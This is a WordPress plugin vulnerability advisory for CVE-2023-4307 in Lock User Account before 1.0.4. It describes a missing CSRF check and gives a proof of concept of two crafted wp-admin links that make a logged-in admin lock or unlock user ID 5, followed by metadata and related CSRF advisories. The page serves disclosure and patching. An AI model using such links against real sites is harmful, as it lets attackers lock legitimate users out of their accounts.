Lock User Account < 1.0.4 – Arbitrary Account Lock/Unlock via CSRF | CVE 2023-4307 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when bulk locking and unlocking accounts, which could allow attackers to make logged in admins lock and unlock arbitrary users via a CSRF attack

Proof of Concept

Make a logged in admin open one of the links below, this will make them lock/unlock the user with ID 5

https://example.com/wp-admin/users.php?action=lock&action2=lock&users%5B0%5D=5

https://example.com/wp-admin/users.php?action=unlock&action2=unlock&users%5B0%5D=5

Affects Plugins

lock-user-account

Fixed in 1.0.4

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Dmitrii Ignatyev

Submitter

Dmitrii Ignatyev

Submitter website

https://blog.cleantalk.org

Verified

Yes

WPVDB ID

06f7aa45-b5d0-4afb-95cc-8f1c82f6f8b3

Timeline

Publicly Published

2023-08-21 (about 8 months ago)

Added

2023-08-21 (about 8 months ago)

Last Updated

2024-01-26 (about 3 months ago)

Other

Published

Title

Published

2023-09-29

Title

Keap Landing Pages <= 1.4.2 - Settings Update via CSRF

Published

2024-01-31

Title

Accessibility < 1.0.7 - Cross-Site Request Forgery

Published

2021-11-15

Title

Filter Portfolio Gallery <= 1.5 - Arbitrary Gallery Deletion via CSRF

Published

2023-03-22

Title

LiteSpeed Cache <= 5.3 - CSRF

Published

2023-08-07

Title

POEditor < 0.9.8 - Settings Reset via CSRF